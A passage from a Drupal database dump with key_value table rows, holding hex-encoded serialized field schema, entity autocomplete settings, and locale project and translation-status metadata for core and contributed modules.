('entity.storage_schema.sql', 'user.field_schema_data.user_picture', 0x613a313a7b733a31383a22757365725f5f757365725f70696374757265223b613a353a7b733a31313a226465736372697074696f6e223b733a34313a22446174612073746f7261676520666f722075736572206669656c6420757365725f706963747572652e223b733a363a226669656c6473223b613a31313a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a3131343a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f2c20776869636820666f7220616e20756e76657273696f6e656420656e746974792074797065206973207468652073616d652061732074686520656e74697479206964223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a32323a22757365725f706963747572655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a31363a22757365725f706963747572655f616c74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a22416c7465726e617469766520696d61676520746578742c20666f722074686520696d61676527732027616c7427206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3531323b733a383a226e6f74206e756c6c223b623a303b7d733a31383a22757365725f706963747572655f7469746c65223b613a343a7b733a31313a226465736372697074696f6e223b733a35323a22496d616765207469746c6520746578742c20666f722074686520696d616765277320277469746c6527206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a313032343b733a383a226e6f74206e756c6c223b623a303b7d733a31383a22757365725f706963747572655f7769647468223b613a343a7b733a31313a226465736372697074696f6e223b733a33333a22546865207769647468206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d733a31393a22757365725f706963747572655f686569676874223b613a343a7b733a31313a226465736372697074696f6e223b733a33343a2254686520686569676874206f662074686520696d61676520696e20706978656c732e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a32323a22757365725f706963747572655f7461726765745f6964223b613a313a7b693a303b733a32323a22757365725f706963747572655f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a32323a22757365725f706963747572655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a32323a22757365725f706963747572655f7461726765745f6964223b733a333a22666964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'user.field_schema_data.uuid', 0x613a313a7b733a353a227573657273223b613a323a7b733a363a226669656c6473223b613a313a7b733a343a2275756964223b613a343a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a32333a22757365725f6669656c645f5f757569645f5f76616c7565223b613a313a7b693a303b733a343a2275756964223b7d7d7d7d),
('entity_autocomplete', '5tEo9xwQw5nHndKEP4ChYg_D7DW2ul1AXf6BCmw1lA8', 0x613a313a7b733a31343a227461726765745f62756e646c6573223b613a313a7b733a343a2274616773223b733a343a2274616773223b7d7d),
('entity_autocomplete', 'De0unJevXJdTqMGxJ3AjsyBeMeACeiqcy7Z6pSBbGig', 0x613a353a7b733a31343a227461726765745f62756e646c6573223b613a313a7b733a343a2274616773223b733a343a2274616773223b7d733a343a22736f7274223b613a313a7b733a353a226669656c64223b733a353a225f6e6f6e65223b7d733a31313a226175746f5f637265617465223b623a313b733a31343a226d617463685f6f70657261746f72223b733a383a22434f4e5441494e53223b733a31313a226d617463685f6c696d6974223b693a31303b7d),
('entity_autocomplete', 'GjFQcO769V4BkCo7gzpjRFVE8CCWkun58ci68L7af_w', 0x613a303a7b7d),
('entity_autocomplete', 'q_O5vbEmFQfnx8Cq0sGUJo4yt711oIzvRMhbHYr4obY', 0x613a303a7b7d),
('entity_autocomplete', 'vID9KEitiPOqvMUvazOUTXyASdXWpNKoeLQUVGihfz8', 0x613a323a7b733a31343a226d617463685f6f70657261746f72223b733a383a22434f4e5441494e53223b733a31313a226d617463685f6c696d6974223b693a31303b7d),
('locale.project', 'adaptivetheme', 0x613a31303a7b733a343a226e616d65223b733a31333a2261646170746976657468656d65223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a373a22415420436f7265223b733a373a227061636b616765223b733a31333a2261646170746976657468656d65223b733a373a2276657273696f6e223b733a353a22372e312e31223b733a373a2270726f6a656374223b733a31333a2261646170746976657468656d65223b733a393a22646174657374616d70223b693a313733383531313033353b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731343837383b7d733a393a22646174657374616d70223b693a313733383531313033353b733a383a22696e636c75646573223b613a313a7b733a373a2261745f636f7265223b733a373a22415420436f7265223b7d733a31323a2270726f6a6563745f74797065223b733a353a227468656d65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a353a22372e312e31223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'admin_toolbar', 0x613a31303a7b733a343a226e616d65223b733a31333a2261646d696e5f746f6f6c626172223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a31333a2241646d696e20546f6f6c626172223b733a373a227061636b616765223b733a31343a2241646d696e697374726174696f6e223b733a373a2276657273696f6e223b733a353a22332e362e33223b733a373a2270726f6a656374223b733a31333a2261646d696e5f746f6f6c626172223b733a393a22646174657374616d70223b693a313736373132373237313b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731323138353b7d733a393a22646174657374616d70223b693a313736373132373237313b733a383a22696e636c75646573223b613a333a7b733a31333a2261646d696e5f746f6f6c626172223b733a31333a2241646d696e20546f6f6c626172223b733a32303a2261646d696e5f746f6f6c6261725f736561726368223b733a32303a2241646d696e20546f6f6c62617220536561726368223b733a31393a2261646d696e5f746f6f6c6261725f746f6f6c73223b733a32353a2241646d696e20546f6f6c62617220457874726120546f6f6c73223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a353a22332e362e33223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'at_tool', 0x613a31303a7b733a343a226e616d65223b733a373a2261745f746f6f6c223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a31383a224154205468656d652047656e657261746f72223b733a373a227061636b616765223b733a31343a2241646170746976657468656d6573223b733a373a2276657273696f6e223b733a353a22322e302e35223b733a373a2270726f6a656374223b733a373a2261745f746f6f6c223b733a393a22646174657374616d70223b693a313731333034383436313b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731323138373b7d733a393a22646174657374616d70223b693a313731333034383436313b733a383a22696e636c75646573223b613a323a7b733a31383a2261745f7468656d655f67656e657261746f72223b733a31383a224154205468656d652047656e657261746f72223b733a373a2261745f746f6f6c223b733a373a22415420546f6f6c223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a353a22322e302e35223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'captcha', 0x613a31303a7b733a343a226e616d65223b733a373a2263617074636861223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a373a2243415054434841223b733a373a227061636b616765223b733a31323a225370616d20636f6e74726f6c223b733a373a2276657273696f6e223b733a383a22382e782d312e3137223b733a373a2270726f6a656374223b733a373a2263617074636861223b733a393a22646174657374616d70223b693a313737313532393939363b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731323231333b7d733a393a22646174657374616d70223b693a313737313532393939363b733a383a22696e636c75646573223b613a323a7b733a373a2263617074636861223b733a373a2243415054434841223b733a31333a22696d6167655f63617074636861223b733a31333a22496d6167652043415054434841223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a383a22382e782d312e3137223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'drupal', 0x613a31303a7b733a343a226e616d65223b733a363a2264727570616c223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a31343a224175746f6d617465642043726f6e223b733a373a227061636b616765223b733a343a22436f7265223b733a373a2276657273696f6e223b733a373a2231302e362e3135223b733a373a2270726f6a656374223b733a363a2264727570616c223b733a393a22646174657374616d70223b693a313738363031313138363b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731353232393b7d733a393a22646174657374616d70223b693a313738363031313138363b733a383a22696e636c75646573223b613a35313a7b733a31343a226175746f6d617465645f63726f6e223b733a31343a224175746f6d617465642043726f6e223b733a383a226269675f70697065223b733a373a2242696750697065223b733a353a22626c6f636b223b733a353a22426c6f636b223b733a31333a22626c6f636b5f636f6e74656e74223b733a31333a22426c6f636b20436f6e74656e74223b733a31303a22627265616b706f696e74223b733a31303a22427265616b706f696e74223b733a393a22636b656469746f7235223b733a31303a22434b456469746f722035223b733a373a22636f6d6d656e74223b733a373a22436f6d6d656e74223b733a363a22636f6e666967223b733a32313a22436f6e66696775726174696f6e204d616e61676572223b733a31383a22636f6e6669675f7472616e736c6174696f6e223b733a32353a22436f6e66696775726174696f6e205472616e736c6174696f6e223b733a373a22636f6e74616374223b733a373a22436f6e74616374223b733a31393a22636f6e74656e745f7472616e736c6174696f6e223b733a31393a22436f6e74656e74205472616e736c6174696f6e223b733a31303a22636f6e7465787475616c223b733a31363a22436f6e7465787475616c204c696e6b73223b733a383a226461746574696d65223b733a383a224461746574696d65223b733a353a2264626c6f67223b733a31363a224461746162617365204c6f6767696e67223b733a31383a2264796e616d69635f706167655f6361636865223b733a32373a22496e7465726e616c2044796e616d69632050616765204361636865223b733a363a22656469746f72223b733a31313a225465787420456469746f72223b733a353a226669656c64223b733a353a224669656c64223b733a383a226669656c645f7569223b733a383a224669656c64205549223b733a343a2266696c65223b733a343a2246696c65223b733a363a2266696c746572223b733a363a2246696c746572223b733a343a2268656c70223b733a343a2248656c70223b733a373a22686973746f7279223b733a373a22486973746f7279223b733a353a22696d616765223b733a353a22496d616765223b733a383a226c616e6775616765223b733a383a224c616e6775616765223b733a343a226c696e6b223b733a343a224c696e6b223b733a363a226c6f63616c65223b733a32313a22496e74657266616365205472616e736c6174696f6e223b733a353a226d65646961223b733a353a224d65646961223b733a31333a226d656469615f6c696272617279223b733a31333a224d65646961204c696272617279223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b733a31373a22437573746f6d204d656e75204c696e6b73223b733a373a226d656e755f7569223b733a373a224d656e75205549223b733a353a226d7973716c223b733a353a224d7953514c223b733a343a226e6f6465223b733a343a224e6f6465223b733a373a226f7074696f6e73223b733a373a224f7074696f6e73223b733a31303a22706167655f6361636865223b733a31393a22496e7465726e616c2050616765204361636865223b733a343a2270617468223b733a343a2250617468223b733a31303a22706174685f616c696173223b733a31303a225061746820616c696173223b733a363a22706870617373223b733a32323a2250617373776f726420436f6d7061746962696c697479223b733a363a22736561726368223b733a363a22536561726368223b733a383a2273686f7274637574223b733a383a2253686f7274637574223b733a363a2273797374656d223b733a363a2253797374656d223b733a383a227461786f6e6f6d79223b733a383a225461786f6e6f6d79223b733a343a2274657874223b733a343a2254657874223b733a373a22746f6f6c626172223b733a373a22546f6f6c626172223b733a343a22746f7572223b733a343a22546f7572223b733a363a22757064617465223b733a31343a22557064617465204d616e61676572223b733a343a2275736572223b733a343a2255736572223b733a353a227669657773223b733a353a225669657773223b733a383a2276696577735f7569223b733a383a225669657773205549223b733a383a227374616e64617264223b733a383a225374616e64617264223b733a353a22636c61726f223b733a353a22436c61726f223b733a373a226f6c697665726f223b733a373a224f6c697665726f223b7d733a31323a2270726f6a6563745f74797065223b733a343a22636f7265223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a373a2231302e362e3135223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('locale.project', 'lang_dropdown', 0x613a31303a7b733a343a226e616d65223b733a31333a226c616e675f64726f70646f776e223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a32363a224c616e67756167652053776974636865722044726f70646f776e223b733a373a227061636b616765223b733a31323a224d756c74696c696e6775616c223b733a373a2276657273696f6e223b733a373a22382e782d322e34223b733a373a2270726f6a656374223b733a31333a226c616e675f64726f70646f776e223b733a393a22646174657374616d70223b693a313735383532393636323b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731323233333b7d733a393a22646174657374616d70223b693a313735383532393636323b733a383a22696e636c75646573223b613a313a7b733a31333a226c616e675f64726f70646f776e223b733a32363a224c616e67756167652053776974636865722044726f70646f776e223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a373a22382e782d322e34223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'pathauto', 0x613a31303a7b733a343a226e616d65223b733a383a22706174686175746f223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a383a22506174686175746f223b733a373a2276657273696f6e223b733a383a22382e782d312e3135223b733a373a2270726f6a656374223b733a383a22706174686175746f223b733a393a22646174657374616d70223b693a313737373933313034323b733a373a227061636b616765223b733a353a224f74686572223b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731353435353b7d733a393a22646174657374616d70223b693a313737373933313034323b733a383a22696e636c75646573223b613a313a7b733a383a22706174686175746f223b733a383a22506174686175746f223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a383a22382e782d312e3135223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'stable', 0x613a31303a7b733a343a226e616d65223b733a363a22737461626c65223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a363a22537461626c65223b733a373a227061636b616765223b733a343a22436f7265223b733a373a2276657273696f6e223b733a353a22322e312e30223b733a373a2270726f6a656374223b733a363a22737461626c65223b733a393a22646174657374616d70223b693a313732313230323935383b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731343837343b7d733a393a22646174657374616d70223b693a313732313230323935383b733a383a22696e636c75646573223b613a313a7b733a363a22737461626c65223b733a363a22537461626c65223b7d733a31323a2270726f6a6563745f74797065223b733a353a227468656d65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a353a22322e312e30223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'token', 0x613a31303a7b733a343a226e616d65223b733a353a22746f6b656e223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a353a22546f6b656e223b733a373a2276657273696f6e223b733a383a22382e782d312e3137223b733a373a2270726f6a656374223b733a353a22746f6b656e223b733a393a22646174657374616d70223b693a313736373934313339333b733a373a227061636b616765223b733a353a224f74686572223b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731353435333b7d733a393a22646174657374616d70223b693a313736373934313339333b733a383a22696e636c75646573223b613a313a7b733a353a22746f6b656e223b733a353a22546f6b656e223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a383a22382e782d312e3137223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'translation_views', 0x613a31303a7b733a343a226e616d65223b733a31373a227472616e736c6174696f6e5f7669657773223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a31373a225472616e736c6174696f6e205669657773223b733a373a227061636b616765223b733a31323a224d756c74696c696e6775616c223b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a373a2270726f6a656374223b733a31373a227472616e736c6174696f6e5f7669657773223b733a393a22646174657374616d70223b693a313637393636303637303b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731323234313b7d733a393a22646174657374616d70223b693a313637393636303637303b733a383a22696e636c75646573223b613a313a7b733a31373a227472616e736c6174696f6e5f7669657773223b733a31373a225472616e736c6174696f6e205669657773223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'views_slideshow', 0x613a31303a7b733a343a226e616d65223b733a31353a2276696577735f736c69646573686f77223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a32313a22566965777320536c69646573686f77204379636c65223b733a373a227061636b616765223b733a353a225669657773223b733a373a2276657273696f6e223b733a353a22352e302e31223b733a373a2270726f6a656374223b733a31353a2276696577735f736c69646573686f77223b733a393a22646174657374616d70223b693a313732343034303337333b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731323234323b7d733a393a22646174657374616d70223b693a313732343034303337333b733a383a22696e636c75646573223b613a323a7b733a32313a2276696577735f736c69646573686f775f6379636c65223b733a32313a22566965777320536c69646573686f77204379636c65223b733a31353a2276696577735f736c69646573686f77223b733a31353a22566965777320536c69646573686f77223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a353a22352e302e31223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.project', 'we_megamenu', 0x613a31303a7b733a343a226e616d65223b733a31313a2277655f6d6567616d656e75223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a32353a224d656761204d656e7520666f722044727570616c20392f3130223b733a373a227061636b616765223b733a31303a2257654d6567614d656e75223b733a373a2276657273696f6e223b733a383a22382e782d312e3136223b733a373a2270726f6a656374223b733a31313a2277655f6d6567616d656e75223b733a393a22646174657374616d70223b693a313639333338373937343b733a31363a225f696e666f5f66696c655f6374696d65223b693a313738363731323234333b7d733a393a22646174657374616d70223b693a313639333338373937343b733a383a22696e636c75646573223b613a313a7b733a31313a2277655f6d6567616d656e75223b733a32353a224d656761204d656e7520666f722044727570616c20392f3130223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a383a22382e782d312e3136223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b7d),
('locale.translation_status', 'translation_views', 0x613a323a7b733a323a226a61223b4f3a383a22737464436c617373223a31363a7b733a343a226e616d65223b733a31373a227472616e736c6174696f6e5f7669657773223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a31373a225472616e736c6174696f6e205669657773223b733a373a227061636b616765223b733a31323a224d756c74696c696e6775616c223b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a373a2270726f6a656374223b733a31373a227472616e736c6174696f6e5f7669657773223b733a393a22646174657374616d70223b693a313637393636303637303b733a31363a225f696e666f5f66696c655f6374696d65223b693a313638383338313130343b7d733a393a22646174657374616d70223b693a313637393636303637303b733a383a22696e636c75646573223b613a313a7b733a31373a227472616e736c6174696f6e5f7669657773223b733a31373a225472616e736c6174696f6e205669657773223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b733a373a2270726f6a656374223b733a31373a227472616e736c6174696f6e5f7669657773223b733a383a226c616e67636f6465223b733a323a226a61223b733a343a2274797065223b733a373a2263757272656e74223b733a393a2274696d657374616d70223b693a313638383338323938353b733a31323a226c6173745f636865636b6564223b693a313638383338323938343b733a353a2266696c6573223b613a323a7b733a363a2272656d6f7465223b4f3a383a22737464436c617373223a373a7b733a373a2270726f6a656374223b733a31373a227472616e736c6174696f6e5f7669657773223b733a383a226c616e67636f6465223b733a323a226a61223b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a343a2274797065223b733a363a2272656d6f7465223b733a383a2266696c656e616d65223b733a33393a227472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131312e6a612e706f223b733a333a22757269223b733a3130333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f616c6c2f7472616e736c6174696f6e5f76696577732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131312e6a612e706f223b733a393a2274696d657374616d70223b693a313637393636313936363b7d733a353a226c6f63616c223b4f3a383a22737464436c617373223a383a7b733a373a2270726f6a656374223b733a31373a227472616e736c6174696f6e5f7669657773223b733a383a226c616e67636f6465223b733a323a226a61223b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a343a2274797065223b733a353a226c6f63616c223b733a383a2266696c656e616d65223b733a33393a227472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131312e6a612e706f223b733a333a22757269223b733a35343a227472616e736c6174696f6e733a2f2f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131312e6a612e706f223b733a393a2274696d657374616d70223b693a313638383338323938353b733a393a226469726563746f7279223b733a31353a227472616e736c6174696f6e733a2f2f223b7d7d7d733a323a226b6f223b4f3a383a22737464436c617373223a31363a7b733a343a226e616d65223b733a31373a227472616e736c6174696f6e5f7669657773223b733a343a22696e666f223b613a363a7b733a343a226e616d65223b733a31373a225472616e736c6174696f6e205669657773223b733a373a227061636b616765223b733a31323a224d756c74696c696e6775616c223b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a373a2270726f6a656374223b733a31373a227472616e736c6174696f6e5f7669657773223b733a393a22646174657374616d70223b693a313637393636303637303b733a31363a225f696e666f5f66696c655f6374696d65223b693a313638383338313130343b7d733a393a22646174657374616d70223b693a313637393636303637303b733a383a22696e636c75646573223b613a313a7b733a31373a227472616e736c6174696f6e5f7669657773223b733a31373a225472616e736c6174696f6e205669657773223b7d733a31323a2270726f6a6563745f74797065223b733a363a226d6f64756c65223b733a31343a2270726f6a6563745f737461747573223b623a313b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a343a22636f7265223b733a333a22616c6c223b733a31343a227365727665725f7061747465726e223b733a38373a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f25636f72652f2570726f6a6563742f2570726f6a6563742d2576657273696f6e2e256c616e67756167652e706f223b733a363a22737461747573223b693a313b733a373a2270726f6a656374223b733a31373a227472616e736c6174696f6e5f7669657773223b733a383a226c616e67636f6465223b733a323a226b6f223b733a343a2274797065223b733a373a2263757272656e74223b733a393a2274696d657374616d70223b693a313638383338323938353b733a31323a226c6173745f636865636b6564223b693a313638383338323938343b733a353a2266696c6573223b613a323a7b733a363a2272656d6f7465223b4f3a383a22737464436c617373223a373a7b733a373a2270726f6a656374223b733a31373a227472616e736c6174696f6e5f7669657773223b733a383a226c616e67636f6465223b733a323a226b6f223b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a343a2274797065223b733a363a2272656d6f7465223b733a383a2266696c656e616d65223b733a33393a227472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131312e6b6f2e706f223b733a333a22757269223b733a3130333a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f7472616e736c6174696f6e732f616c6c2f7472616e736c6174696f6e5f76696577732f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131312e6b6f2e706f223b733a393a2274696d657374616d70223b693a313637393636313936363b7d733a353a226c6f63616c223b4f3a383a22737464436c617373223a383a7b733a373a2270726f6a656374223b733a31373a227472616e736c6174696f6e5f7669657773223b733a383a226c616e67636f6465223b733a323a226b6f223b733a373a2276657273696f6e223b733a31353a22382e782d312e302d616c7068613131223b733a343a2274797065223b733a353a226c6f63616c223b733a383a2266696c656e616d65223b733a33393a227472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131312e6b6f2e706f223b733a333a22757269223b733a35343a227472616e736c6174696f6e733a2f2f7472616e736c6174696f6e5f76696577732d382e782d312e302d616c70686131312e6b6f2e706f223b733a393a2274696d657374616d70223b693a313638383338323938353b733a393a